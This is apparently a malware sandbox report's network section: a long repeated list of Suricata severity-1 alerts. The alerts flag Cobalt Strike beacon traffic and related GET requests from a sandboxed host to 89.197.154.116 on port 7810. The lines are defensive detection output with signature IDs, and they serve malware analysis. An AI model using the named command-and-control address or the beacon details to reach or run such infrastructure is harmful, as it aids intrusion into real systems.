Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49736 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49736 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49757 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49757 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49748 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49732 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49748 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49751 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49758 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49734 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49758 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49751 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49765 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49762 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49738 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49765 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49745 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49762 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49745 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49731 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49755 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49747 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49747 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49756 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49750 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49754 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49750 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49754 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49769 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49769 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49825 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49825 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49749 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49807 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49756 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49737 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49761 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49761 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49764 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49780 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49840 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49780 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49753 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49760 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49760 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49840 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49791 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49791 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49752 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49759 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49759 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49857 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49767 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49730 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49733 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49894 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49894 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49735 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49807 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49857 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49931 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49879 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49931 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49879 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49851 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49851 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49939 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49939 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49868 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49868 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49974 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49974 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49985 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49985 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49818 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49818 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49964 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49964 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50010 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49763 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49763 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50010 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50056 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50056 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50036 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50036 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50068 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50069 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50070 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50070 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50073 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50073 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50086 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50069 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50063 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50080 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50072 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50080 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50072 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50068 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50086 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50063 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49999 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50091 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:49999 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50077 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50077 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50071 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50083 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50071 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50091 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50076 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50076 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50094 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50094 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50115 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50115 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50067 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50067 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50064 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50064 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50126 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50126 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50062 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50105 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50105 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50075 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50075 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50074 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50112 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50083 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50074 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50120 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50112 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50079 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50079 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50117 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50081 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50127 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50081 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50120 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50117 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50062 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50047 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50047 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50090 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50102 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50078 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50102 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50092 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50090 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50092 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50097 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50097 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50061 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50116 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50125 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50109 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50125 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50088 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50109 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50122 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50135 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50088 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50093 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50078 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50104 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50085 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2036677 - Severity 1 - ET MALWARE Cobalt Strike Related Activity (GET) : 192.168.2.4:50116 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49918 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50099 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50110 -> 89.197.154.116:7810
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50129 -> 89.197.154.116:7810
